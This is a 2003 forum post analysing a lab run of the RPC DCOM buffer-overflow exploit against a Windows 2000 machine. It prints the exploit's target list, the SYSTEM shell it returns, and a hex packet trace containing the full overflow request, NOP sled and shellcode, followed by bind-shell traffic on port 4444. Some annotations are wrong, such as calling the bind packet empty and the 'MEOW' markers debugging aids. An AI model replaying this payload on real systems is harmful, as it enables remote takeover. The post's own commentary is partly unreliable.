
RPC DCOM exploit and cursory analysis

alt.don
Posted: Wed Aug 06, 2003 7:03 pm    Post subject: RPC DCOM exploit and cursory analysis

Cursory analysis of the RPC DCOM exploit rewritten by hdm

Lab conditions for the RPC DCOM exploit by hdm

192.168.2.113 This is the machine which is sending the exploit. It is a SuSE 8.0 Pro box.

192.168.2.101 This is the victim machine. It is Win2K Pro Svc Pack I. This machine is unprotected, i.e. no firewall or filtering router in front of it.

All of the lab machines are connected via an SMC Barricade switch. This can effectively simulate the below noted packets arriving to their destination without actually sending them over the internet. As well please note that my references to src machine mean the source computer pushing across the exploit, and that dst equates to destination computer.

The below noted packet trace has been truncated for the sake of brevity. There were over a thousand packets exchanged during the exploit itself, and subsequent cursory manipulation of the victim machine. The entire packet trace can be found on the enclosed floppy. Also note that the below noted packet trace is done in a time sequential order vice a hodge podge of packets ie: from the beginning of the exploit to the end. That being said please see the below noted packet trace for an explanation of the exploit, as well as to see it in action. The text below a packet references the packet directly above it. The packet trace follows the below noted invocation of the exploit itself, and the resulting command prompt returned.

Cut and Paste of xterm window showing exploit interface when invoked
Code:

 monkeeboy:/home/don # ./don2.1

---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Usage: ./don2.1 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
Code:

 monkeeboy:/home/don # ./don2.1 1 192.168.2.101

---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e829ec
- Dropping to System Shell...

The below noted is the command prompt returned by the victim machine
Code:

 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-2000 Microsoft Corp.

 C:\WINNT\system32>cd c:\
 cd c:\

 C:\>dir
 dir
  Volume in drive C has no label.
  Volume Serial Number is 60C2-0926

  Directory of C:\

 07/24/2003  01:14p      <DIR>          Documents and Settings
 08/03/2003  10:44a             155,204 don.rpc
 08/03/2003  10:56a               8,007 don.rpc2
 08/01/2003  02:46p      <DIR>          Inetpub
 08/01/2003  02:34p      <DIR>          Program Files
 08/01/2003  11:25a             397,312 WinDump.exe
 08/01/2003  02:47p      <DIR>          WINNT
                3 File(s)        560,523 bytes
                4 Dir(s)   2,694,471,680 bytes free

 C:\>



Packet Trace of RPC DCOM exploit by hdm
Code:

10:42:25.292982 IP (tos 0x0, ttl 64, id 63883, len 60) 192.168.2.113.32773 > 192.168.2.101.135: S [tcp sum ok] 291781359:291781359(0) win 5840 <mss 1460,sackOK,timestamp 50020 0,nop,wscale 0> (DF)
0x0000    4500 003c f98b 4000 4006 bb09 c0a8 0271   E..<..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3aef 0000 0000   ...e.....d:.....
0x0020    a002 16d0 1acc 0000 0204 05b4 0402 080a   ................
0x0030    0000 c364 0000 0000 0103 0300             ...d........

Here we have the initial syn packet sent to the victim machine
Code:

10:42:25.293489 IP (tos 0x0, ttl 128, id 117, len 64) 192.168.2.101.135 > 192.168.2.113.32773: S [tcp sum ok] 4086326976:4086326976(0) ack 291781360 win 17520 <mss 1460,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> (DF)
0x0000    4500 0040 0075 4000 8006 741c c0a8 0265   E..@.u@...t....e
0x0010    c0a8 0271 0087 8005 f390 66c0 1164 3af0   ...q......f..d:.
0x0020    b012 4470 4428 0000 0204 05b4 0103 0300   ..DpD(..........
0x0030    0101 080a 0000 0000 0000 0000 0101 0402   ................

The victim machine answers with a syn/ack
Code:

10:42:25.293645 IP (tos 0x0, ttl 64, id 63884, len 52) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] ack 1 win 5840 <nop,nop,timestamp 50020 0> (DF)
0x0000    4500 0034 f98c 4000 4006 bb10 c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3af0 f390 66c1   ...e.....d:...f.
0x0020    8010 16d0 ef2e 0000 0101 080a 0000 c364   ...............d
0x0030    0000 0000                                 ....

The source machine launching the exploit answers back with an ack signifying the end of the 3 way tcp/ip handshake

3 way tcp/ip handshake now over, and the exchange of data will begin
Code:

10:42:25.299962 IP (tos 0x0, ttl 64, id 63885, len 124) 192.168.2.113.32773 > 192.168.2.101.135: P [tcp sum ok] 1:73(72) ack 1 win 5840 <nop,nop,timestamp 50020 0> (DF)
0x0000    4500 007c f98d 4000 4006 bac7 c0a8 0271   E..|..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3af0 f390 66c1   ...e.....d:...f.
0x0020    8018 16d0 a5f5 0000 0101 080a 0000 c364   ...............d
0x0030    0000 0000 0500 0b03 1000 0000 4800 0000   ............H...
0x0040    7f00 0000 d016 d016 0000 0000 0100 0000   ................
0x0050    0100 0100 a001 0000 0000 0000 c000 0000   ................
0x0060    0000 0046 0000 0000 045d 888a eb1c c911   ...F.....]......
0x0070    9fe8 0800 2b10 4860 0200 0000             ....+.H`....

This is a psh/ack as seen above though with no data in it. Possibly just testing connectivity again before the shell code is pushed across.
Code:

10:42:25.495010 IP (tos 0x0, ttl 128, id 118, len 52) 192.168.2.101.135 > 192.168.2.113.32773: . [tcp sum ok] ack 73 win 17448 <nop,nop,timestamp 2865 50020> (DF)
0x0000    4500 0034 0076 4000 8006 7427 c0a8 0265   E..4.v@...t'...e
0x0010    c0a8 0271 0087 8005 f390 66c1 1164 3b38   ...q......f..d;8
0x0020    8010 4428 b65d 0000 0101 080a 0000 0b31   ..D(.].........1
0x0030    0000 c364                                 ...d

The victim machine just ack’ng back the receipt of packets
Code:

10:42:32.822800 IP (tos 0x0, ttl 128, id 119, len 112) 192.168.2.101.135 > 192.168.2.113.32773: P [tcp sum ok] 1:61(60) ack 73 win 17448 <nop,nop,timestamp 2938 50020> (DF)
0x0000    4500 0070 0077 4000 8006 73ea c0a8 0265   E..p.w@...s....e
0x0010    c0a8 0271 0087 8005 f390 66c1 1164 3b38   ...q......f..d;8
0x0020    8018 4428 e85e 0000 0101 080a 0000 0b7a   ..D(.^.........z
0x0030    0000 c364 0500 0c03 1000 0000 3c00 0000   ...d........<...
0x0040    7f00 0000 d016 d016 879d 0000 0400 3133   ..............13
0x0050    3500 0000 0100 0000 0000 0000 045d 888a   5............]..
0x0060    eb1c c911 9fe8 0800 2b10 4860 0200 0000   ........+.H`....

The victim machine doing a psh/ack with nothing noted in the ascii
Code:

10:42:32.824173 IP (tos 0x0, ttl 64, id 63886, len 52) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0034 f98e 4000 4006 bb0e c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3b38 f390 66fd   ...e.....d;8..f.
0x0020    8010 16d0 e03f 0000 0101 080a 0000 c655   .....?.........U
0x0030    0000 0b7a                                 ...z

The src machine ack’ng receipt
Code:

10:42:32.824444 IP (tos 0x0, ttl 64, id 63887, len 1500) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] 73:1521(1448) ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 05dc f98f 4000 4006 b565 c0a8 0271   E.....@.@..e...q
0x0010    c0a8 0265 8005 0087 1164 3b38 f390 66fd   ...e.....d;8..f.
0x0020    8010 16d0 9d23 0000 0101 080a 0000 c655   .....#.........U
0x0030    0000 0b7a 0500 0003 1000 0000 a806 0000   ...z............
0x0040    e500 0000 9006 0000 0100 0400 0500 0600   ................
0x0050    0100 0000 0000 0000 3224 58fd cc45 6449   ........2$X..EdI
0x0060    b070 ddae 742c 96d2 605e 0d00 0100 0000   .p..t,..`^......
0x0070    0000 0000 705e 0d00 0200 0000 7c5e 0d00   ....p^......|^..
0x0080    0000 0000 1000 0000 8096 f1f1 2a4d ce11   ............*M..
0x0090    a66a 0020 af6e 72f4 0c00 0000 4d41 5242   .j...nr.....MARB
0x00a0    0100 0000 0000 0000 0df0 adba 0000 0000   ................
0x00b0    a8f4 0b00 2006 0000 2006 0000 4d45 4f57   ............MEOW
0x00c0    0400 0000 a201 0000 0000 0000 c000 0000   ................
0x00d0    0000 0046 3803 0000 0000 0000 c000 0000   ...F8...........
0x00e0    0000 0046 0000 0000 f005 0000 e805 0000   ...F............
0x00f0    0000 0000 0110 0800 cccc cccc c800 0000   ................
0x0100    4d45 4f57 e805 0000 d800 0000 0000 0000   MEOW............
0x0110    0200 0000 0700 0000 0000 0000 0000 0000   ................
0x0120    0000 0000 0000 0000 c428 cd00 6429 cd00   .........(..d)..
0x0130    0000 0000 0700 0000 b901 0000 0000 0000   ................
0x0140    c000 0000 0000 0046 ab01 0000 0000 0000   .......F........
0x0150    c000 0000 0000 0046 a501 0000 0000 0000   .......F........
0x0160    c000 0000 0000 0046 a601 0000 0000 0000   .......F........
0x0170    c000 0000 0000 0046 a401 0000 0000 0000   .......F........
0x0180    c000 0000 0000 0046 ad01 0000 0000 0000   .......F........
0x0190    c000 0000 0000 0046 aa01 0000 0000 0000   .......F........
0x01a0    c000 0000 0000 0046 0700 0000 6000 0000   .......F....`...
0x01b0    5800 0000 9000 0000 4000 0000 2000 0000   X.......@.......
0x01c0    3803 0000 3000 0000 0100 0000 0110 0800   8...0...........
0x01d0    cccc cccc 5000 0000 4fb6 8820 ffff ffff   ....P...O.......
0x01e0    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x01f0    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0200    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0210    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0220    0000 0000 0000 0000 0000 0000 0110 0800   ................
0x0230    cccc cccc 4800 0000 0700 6600 0609 0200   ....H.....f.....
0x0240    0000 0000 c000 0000 0000 0046 1000 0000   ...........F....
0x0250    0000 0000 0000 0000 0100 0000 0000 0000   ................
0x0260    7819 0c00 5800 0000 0500 0600 0100 0000   x...X...........
0x0270    70d8 9893 984f d211 a93d be57 b200 0000   p....O...=.W....
0x0280    3200 3100 0110 0800 cccc cccc 8000 0000   2.1.............
0x0290    0df0 adba 0000 0000 0000 0000 0000 0000   ................
0x02a0    0000 0000 1843 1400 0000 0000 6000 0000   .....C......`...
0x02b0    6000 0000 4d45 4f57 0400 0000 c001 0000   `...MEOW........
0x02c0    0000 0000 c000 0000 0000 0046 3b03 0000   ...........F;...
0x02d0    0000 0000 c000 0000 0000 0046 0000 0000   ...........F....
0x02e0    3000 0000 0100 0100 81c5 1703 800e e94a   0..............J
0x02f0    9999 f18a 506f 7a85 0200 0000 0000 0000   ....Poz.........
0x0300    0000 0000 0000 0000 0000 0000 0000 0000   ................
0x0310    0100 0000 0110 0800 cccc cccc 3000 0000   ............0...
0x0320    7800 6e00 0000 0000 d8da 0d00 0000 0000   x.n.............
0x0330    0000 0000 202f 0c00 0000 0000 0000 0000   ...../..........
0x0340    0300 0000 0000 0000 0300 0000 4600 5800   ............F.X.
0x0350    0000 0000 0110 0800 cccc cccc 1000 0000   ................
0x0360    3000 2e00 0000 0000 0000 0000 0000 0000   0...............
0x0370    0000 0000 0110 0800 cccc cccc 6800 0000   ............h...
0x0380    0e00 ffff 688b 0b00 0200 0000 0000 0000   ....h...........
0x0390    0000 0000 8601 0000 0000 0000 8601 0000   ................
0x03a0    5c00 5c00 4600 5800 4e00 4200 4600 5800   \.\.F.X.N.B.F.X.
0x03b0    4600 5800 4e00 4200 4600 5800 4600 5800   F.X.N.B.F.X.F.X.
0x03c0    4600 5800 4600 5800 ec29 e877 cce0 fd7f   F.X.F.X..).w....
0x03d0    cce0 fd7f 9090 9090 9090 9090 9090 9090   ................
0x03e0    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x03f0    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0400    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0410    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0420    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0430    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0440    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0450    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0460    9090 9090 9090 9090 9090 9090 9090 9090   ................
0x0470    9090 9090 9090 9090 9090 90eb 195e 31c9   .............^1.
0x0480    81e9 89ff ffff 8136 80bf 3294 81ee fcff   .......6..2.....
0x0490    ffff e2f2 eb05 e8e2 ffff ff03 5306 1f74   ............S..t
0x04a0    5775 9580 bfbb 927f 895a 1ace b1de 7ce1   Wu.......Z....|.
0x04b0    be32 9409 f93a 6bb6 d79f 4d85 71da c681   .2...:k...M.q...
0x04c0    bf32 1dc6 b35a f8ec bf32 fcb3 8d1c f0e8   .2...Z...2......
0x04d0    c841 a6df ebcd c288 3674 907f 895a e67e   .A......6t...Z.~
0x04e0    0c24 7cad be32 9409 f922 6bb6 d74c 4c62   .$|..2..."k..LLb
0x04f0    ccda 8a81 bf32 1dc6 abcd e284 d7f9 797c   .....2........y|
0x0500    84da 9a81 bf32 1dc6 a7cd e284 d7eb 9d75   .....2.........u
0x0510    12da 6a80 bf32 1dc6 a3cd e284 d796 8ef0   ..j..2..........
0x0520    78da 7a80 bf32 1dc6 9fcd e284 d796 39ae   x.z..2........9.
0x0530    56da 4a80 bf32 1dc6 9bcd e284 d7d7 dd06   V.J..2..........
0x0540    f6da 5a80 bf32 1dc6 97cd e284 d7d5 ed46   ..Z..2.........F
0x0550    c6da 2a80 bf32 1dc6 9301 6b01 53a2 9580   ..*..2....k.S...
0x0560    bf66 fc81 be32 947f e92a c4d0 ef62 d4d0   .f...2...*...b..
0x0570    ff62 6bd6 a3b9 4cd7 e85a 9680 ae6e 1f4c   .bk...L..Z...n.L
0x0580    d524 c5d3 4064 b4d7 eccd c2a4 e863 c77f   .$..@d.......c..
0x0590    e91a 1f50 d757 ece5 bf5a f7ed db1c 1de6   ...P.W...Z......
0x05a0    8fb1 78d4 320e b0b3 7f01 5d03 7e27 3f62   ..x.2.....].~'?b
0x05b0    42f4 d0a4 af76 6ac4 9b0f 1dd4 9b7a 1dd4   B....vj......z..
0x05c0    9b7e 1dd4 9b62 19c4 9b22 c0d0 ee63 c5ea   .~...b..."...c..
0x05d0    be63 c57f c902 c57f e922 1f4c             .c.......".L

Here we have the src machine pushing across the actual shell code itself. Note the packet is maximal length ie: 1500 bytes, and that the references to “meow” seen above are for debugging purposes to see if the exploit runs properly. Note again the large amount of “no op’s” in the packet. This is always a characteristic of buffer overflows, and many vulnerabilities found in Windows.
Code:

10:42:32.824516 IP (tos 0x0, ttl 64, id 63888, len 308) 192.168.2.113.32773 > 192.168.2.101.135: P [tcp sum ok] 1521:1777(256) ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0134 f990 4000 4006 ba0c c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 40e0 f390 66fd   ...e.....d@...f.
0x0020    8018 16d0 3eac 0000 0101 080a 0000 c655   ....>..........U
0x0030    0000 0b7a d5cd 6bb1 4064 980b 7765 6bd6   ...z..k.@d..wek.
0x0040    93cd c294 ea64 f021 8f32 9480 3af2 ec8c   .....d.!.2..:...
0x0050    3472 980b cf2e 390b d73a 7f89 3472 a00b   4r....9..:..4r..
0x0060    178a 9480 bfb9 51de e2f0 9080 ec67 c2d7   ......Q......g..
0x0070    345e b098 3477 a80b eb37 ec83 6ab9 de98   4^..4w...7..j...
0x0080    3468 b483 62d1 a6c9 3406 1f83 4a01 6b7c   4h..b...4...J.k|
0x0090    8cf2 38ba 7b46 9341 703f 9778 54c0 affc   ..8.{F.Ap?.xT...
0x00a0    9b26 e161 3468 b083 6254 1f8c f4b9 ce9c   .&.a4h..bT......
0x00b0    bcef 1f84 3431 516b bd01 540b 6a6d cadd   ....41Qk..T.jm..
0x00c0    e4f0 9080 2fa2 0400 5c00 4300 2400 5c00   ..../...\.C.$.\.
0x00d0    3100 3200 3300 3400 3500 3600 3100 3100   1.2.3.4.5.6.1.1.
0x00e0    3100 3100 3100 3100 3100 3100 3100 3100   1.1.1.1.1.1.1.1.
0x00f0    3100 3100 3100 3100 3100 2e00 6400 6f00   1.1.1.1.1...d.o.
0x0100    6300 0000 0110 0800 cccc cccc 2000 0000   c...............
0x0110    3000 2d00 0000 0000 882a 0c00 0200 0000   0.-......*......
0x0120    0100 0000 288c 0c00 0100 0000 0700 0000   ....(...........
0x0130    0000 0000                                 ....

This is another packet sent by the src machine to finish sending the exploit itself across

Exploit received by victim machine, connection teardown now happens
Code:

10:42:32.824613 IP (tos 0x0, ttl 64, id 63889, len 52) 192.168.2.113.32773 > 192.168.2.101.135: F [tcp sum ok] 1777:1777(0) ack 61 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0034 f991 4000 4006 bb0b c0a8 0271   E..4..@.@......q
0x0010    c0a8 0265 8005 0087 1164 41e0 f390 66fd   ...e.....dA...f.
0x0020    8011 16d0 d996 0000 0101 080a 0000 c655   ...............U
0x0030    0000 0b7a                                 ...z

10:42:32.824705 IP (tos 0x0, ttl 128, id 120, len 52) 192.168.2.101.135 > 192.168.2.113.32773: . [tcp sum ok] ack 1777 win 17520 <nop,nop,timestamp 2938 50773> (DF)
0x0000    4500 0034 0078 4000 8006 7425 c0a8 0265   E..4.x@...t%...e
0x0010    c0a8 0271 0087 8005 f390 66fd 1164 41e0   ...q......f..dA.
0x0020    8010 4470 abf7 0000 0101 080a 0000 0b7a   ..Dp...........z
0x0030    0000 c655                                 ...U

10:42:32.824717 IP (tos 0x0, ttl 128, id 121, len 52) 192.168.2.101.135 > 192.168.2.113.32773: . [tcp sum ok] ack 1778 win 17520 <nop,nop,timestamp 2938 50773> (DF)
0x0000    4500 0034 0079 4000 8006 7424 c0a8 0265   E..4.y@...t$...e
0x0010    c0a8 0271 0087 8005 f390 66fd 1164 41e1   ...q......f..dA.
0x0020    8010 4470 abf6 0000 0101 080a 0000 0b7a   ..Dp...........z
0x0030    0000 c655                                 ...U

10:42:32.828101 IP (tos 0x0, ttl 128, id 122, len 52) 192.168.2.101.135 > 192.168.2.113.32773: F [tcp sum ok] 61:61(0) ack 1778 win 17520 <nop,nop,timestamp 2938 50773> (DF)
0x0000    4500 0034 007a 4000 8006 7423 c0a8 0265   E..4.z@...t#...e
0x0010    c0a8 0271 0087 8005 f390 66fd 1164 41e1   ...q......f..dA.
0x0020    8011 4470 abf5 0000 0101 080a 0000 0b7a   ..Dp...........z
0x0030    0000 c655                                 ...U

The exploit has now been pushed over to the victim machine and the source computer will now begin a graceful teardown of the connection on port 135 as seen above. Note that the teardown sequence is: fin/ack, ack, ack, fin/ack
Code:

10:42:32.828243 IP (tos 0x0, ttl 255, id 0, len 52) 192.168.2.113.32773 > 192.168.2.101.135: . [tcp sum ok] ack 62 win 5840 <nop,nop,timestamp 50773 2938> (DF)
0x0000    4500 0034 0000 4000 ff06 f59c c0a8 0271   E..4..@........q
0x0010    c0a8 0265 8005 0087 1164 41e1 f390 66fe   ...e.....dA...f.
0x0020    8010 16d0 d995 0000 0101 080a 0000 c655   ...............U
0x0030    0000 0b7a                                 ...z

The src machine ack’s back one more time after the graceful teardown.

Victim machine now answering on port 4444
Code:

10:42:33.832985 IP (tos 0x0, ttl 64, id 36074, len 60) 192.168.2.113.32774 > 192.168.2.101.4444: S [tcp sum ok] 307972688:307972688(0) win 5840 <mss 1460,sackOK,timestamp 50874 0,nop,wscale 0> (DF)
0x0000    4500 003c 8cea 4000 4006 27ab c0a8 0271   E..<..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a50 0000 0000   ...e...\.[JP....
0x0020    a002 16d0 f647 0000 0204 05b4 0402 080a   .....G..........
0x0030    0000 c6ba 0000 0000 0103 0300             ............

The source machine now begins the tcp/ip handshake with the now compromised machine on port 4444 with a syn packet. This port is hard coded in the shell code of the exploit itself.
Code:

10:42:33.833589 IP (tos 0x0, ttl 128, id 123, len 64) 192.168.2.101.4444 > 192.168.2.113.32774: S [tcp sum ok] 4088540613:4088540613(0) ack 307972689 win 17520 <mss 1460,nop,wscale 0,nop,nop,timestamp 0 0,nop,nop,sackOK> (DF)
0x0000    4500 0040 007b 4000 8006 7416 c0a8 0265   E..@.{@...t....e
0x0010    c0a8 0271 115c 8006 f3b2 2dc5 125b 4a51   ...q.\....-..[JQ
0x0020    b012 4470 5bd3 0000 0204 05b4 0103 0300   ..Dp[...........
0x0030    0101 080a 0000 0000 0000 0000 0101 0402   ................

The victim machine syn/acks back on port 4444
Code:

10:42:33.833746 IP (tos 0x0, ttl 64, id 36075, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 1 win 5840 <nop,nop,timestamp 50874 0> (DF)
0x0000    4500 0034 8ceb 4000 4006 27b2 c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2dc6   ...e...\.[JQ..-.
0x0020    8010 16d0 0384 0000 0101 080a 0000 c6ba   ................
0x0030    0000 0000                                 ....

The handshake is now complete, and the exchange of data can now begin.

The victim machine has now given up a cmd shell to the src machine
Code:

10:42:36.777332 IP (tos 0x0, ttl 128, id 124, len 94) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 1:43(42) ack 1 win 17520 <nop,nop,timestamp 2977 50874> (DF)
0x0000    4500 005e 007c 4000 8006 73f7 c0a8 0265   E..^.|@...s....e
0x0010    c0a8 0271 115c 8006 f3b2 2dc6 125b 4a51   ...q.\....-..[JQ
0x0020    8018 4470 008a 0000 0101 080a 0000 0ba1   ..Dp............
0x0030    0000 c6ba 4d69 6372 6f73 6f66 7420 5769   ....Microsoft.Wi
0x0040    6e64 6f77 7320 3230 3030 205b 5665 7273   ndows.2000.[Vers
0x0050    696f 6e20 352e 3030 2e32 3139 355d        ion.5.00.2195]

10:42:36.777533 IP (tos 0x0, ttl 64, id 36076, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 43 win 5840 <nop,nop,timestamp 51168 2977> (DF)
0x0000    4500 0034 8cec 4000 4006 27b1 c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2df0   ...e...\.[JQ..-.
0x0020    8010 16d0 f692 0000 0101 080a 0000 c7e0   ................
0x0030    0000 0ba1                                 ....

10:42:36.777638 IP (tos 0x0, ttl 128, id 125, len 54) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 43:45(2) ack 1 win 17520 <nop,nop,timestamp 2977 51168> (DF)
0x0000    4500 0036 007d 4000 8006 741e c0a8 0265   E..6.}@...t....e
0x0010    c0a8 0271 115c 8006 f3b2 2df0 125b 4a51   ...q.\....-..[JQ
0x0020    8018 4470 bbde 0000 0101 080a 0000 0ba1   ..Dp............
0x0030    0000 c7e0 0d0a                            ......

10:42:36.777775 IP (tos 0x0, ttl 64, id 36077, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 45 win 5840 <nop,nop,timestamp 51168 2977> (DF)
0x0000    4500 0034 8ced 4000 4006 27b0 c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2df2   ...e...\.[JQ..-.
0x0020    8010 16d0 f690 0000 0101 080a 0000 c7e0   ................
0x0030    0000 0ba1                                 ....

10:42:36.777864 IP (tos 0x0, ttl 128, id 126, len 93) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 45:86(41) ack 1 win 17520 <nop,nop,timestamp 2977 51168> (DF)
0x0000    4500 005d 007e 4000 8006 73f6 c0a8 0265   E..].~@...s....e
0x0010    c0a8 0271 115c 8006 f3b2 2df2 125b 4a51   ...q.\....-..[JQ
0x0020    8018 4470 8ccd 0000 0101 080a 0000 0ba1   ..Dp............
0x0030    0000 c7e0 2843 2920 436f 7079 7269 6768   ....(C).Copyrigh
0x0040    7420 3139 3835 2d32 3030 3020 4d69 6372   t.1985-2000.Micr
0x0050    6f73 6f66 7420 436f 7270 2e0d 0a          osoft.Corp...

10:42:36.778000 IP (tos 0x0, ttl 64, id 36078, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 86 win 5840 <nop,nop,timestamp 51168 2977> (DF)
0x0000    4500 0034 8cee 4000 4006 27af c0a8 0271   E..4..@.@.'....q
0x0010    c0a8 0265 8006 115c 125b 4a51 f3b2 2e1b   ...e...\.[JQ....
0x0020    8010 16d0 f667 0000 0101 080a 0000 c7e0   .....g..........
0x0030    0000 0ba1                                 ....

10:42:36.778127 IP (tos 0x0, ttl 128, id 127, len 54) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 86:88(2) ack 1 win 17520 <nop,nop,timestamp 2977 51168> (DF)
0x0000    4500 0036 007f 4000 8006 741c c0a8 0265   E..6..@...t....e
0x0010    c0a8 0271 115c 8006 f3b2 2e1b 125b 4a51   ...q.\.......[JQ
0x0020    8018 4470 bbb3 0000 0101 080a 0000 0ba1   ..Dp............
0x0030    0000 c7e0 0d0a                            ......

This is where we manipulate the victim machine a little bit, as can be seen by the request for Dir of C.
Code:

10:43:07.376735 IP (tos 0x0, ttl 128, id 461, len 113) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 84324:84385(61) ack 16 win 17505 <nop,nop,timestamp 3283 54228> (DF)
0x0000    4500 0071 01cd 4000 8006 7293 c0a8 0265   E..q..@...r....e
0x0010    c0a8 0271 115c 8006 f3b3 7729 125b 4a60   ...q.\....w).[J`
0x0020    8018 4461 cf71 0000 0101 080a 0000 0cd3   ..Da.q..........
0x0030    0000 d3d4 3037 2f32 342f 3230 3033 2020   ....07/24/2003..
0x0040    3031 3a31 3470 2020 2020 2020 3c44 4952   01:14p......<DIR
0x0050    3e20 2020 2020 2020 2020 2044 6f63 756d   >..........Docum
0x0060    656e 7473 2061 6e64 2053 6574 7469 6e67   ents.and.Setting
0x0070    73                                        s

10:43:07.378049 IP (tos 0x0, ttl 64, id 36343, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 84385 win 53576 <nop,nop,timestamp 54228 3283> (DF)
0x0000    4500 0034 8df7 4000 4006 26a6 c0a8 0271   E..4..@.@.&....q
0x0010    c0a8 0265 8006 115c 125b 4a60 f3b3 7766   ...e...\.[J`..wf
0x0020    8010 d148 e56d 0000 0101 080a 0000 d3d4   ...H.m..........
0x0030    0000 0cd3                                 ....

10:43:07.378160 IP (tos 0x0, ttl 128, id 462, len 349) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 84385:84682(297) ack 16 win 17505 <nop,nop,timestamp 3283 54228> (DF)
0x0000    4500 015d 01ce 4000 8006 71a6 c0a8 0265   E..]..@...q....e
0x0010    c0a8 0271 115c 8006 f3b3 7766 125b 4a60   ...q.\....wf.[J`
0x0020    8018 4461 2cd4 0000 0101 080a 0000 0cd3   ..Da,...........
0x0030    0000 d3d4 0d0a 3038 2f30 332f 3230 3033   ......08/03/2003
0x0040    2020 3130 3a34 3361 2020 2020 2020 2020   ..10:43a........
0x0050    2020 2020 2031 3336 2c32 3337 2064 6f6e   .....136,237.don
0x0060    2e72 7063 0d0a 3038 2f30 312f 3230 3033   .rpc..08/01/2003
0x0070    2020 3032 3a34 3670 2020 2020 2020 3c44   ..02:46p......<D
0x0080    4952 3e20 2020 2020 2020 2020 2049 6e65   IR>..........Ine
0x0090    7470 7562 0d0a 3038 2f30 312f 3230 3033   tpub..08/01/2003
0x00a0    2020 3032 3a33 3470 2020 2020 2020 3c44   ..02:34p......<D
0x00b0    4952 3e20 2020 2020 2020 2020 2050 726f   IR>..........Pro
0x00c0    6772 616d 2046 696c 6573 0d0a 3038 2f30   gram.Files..08/0
0x00d0    312f 3230 3033 2020 3131 3a32 3561 2020   1/2003..11:25a..
0x00e0    2020 2020 2020 2020 2020 2033 3937 2c33   ...........397,3
0x00f0    3132 2057 696e 4475 6d70 2e65 7865 0d0a   12.WinDump.exe..
0x0100    3038 2f30 312f 3230 3033 2020 3032 3a34   08/01/2003..02:4
0x0110    3770 2020 2020 2020 3c44 4952 3e20 2020   7p......<DIR>...
0x0120    2020 2020 2020 2057 494e 4e54 0d0a 2020   .......WINNT....
0x0130    2020 2020 2020 2020 2020 2020 2032 2046   .............2.F
0x0140    696c 6528 7329 2020 2020 2020 2020 3533   ile(s)........53
0x0150    332c 3534 3920 6279 7465 730d 0a          3,549.bytes..

10:43:07.378337 IP (tos 0x0, ttl 64, id 36344, len 52) 192.168.2.113.32774 > 192.168.2.101.4444: . [tcp sum ok] ack 84682 win 53576 <nop,nop,timestamp 54228 3283> (DF)
0x0000    4500 0034 8df8 4000 4006 26a5 c0a8 0271   E..4..@.@.&....q
0x0010    c0a8 0265 8006 115c 125b 4a60 f3b3 788f   ...e...\.[J`..x.
0x0020    8010 d148 e444 0000 0101 080a 0000 d3d4   ...H.D..........
0x0030    0000 0cd3                                 ....

10:43:07.378464 IP (tos 0x0, ttl 128, id 463, len 104) 192.168.2.101.4444 > 192.168.2.113.32774: P [tcp sum ok] 84682:84734(52) ack 16 win 17505 <nop,nop,timestamp 3283 54228> (DF)
0x0000    4500 0068 01cf 4000 8006 729a c0a8 0265   E..h..@...r....e
0x0010    c0a8 0271 115c 8006 f3b3 788f 125b 4a60   ...q.\....x..[J`
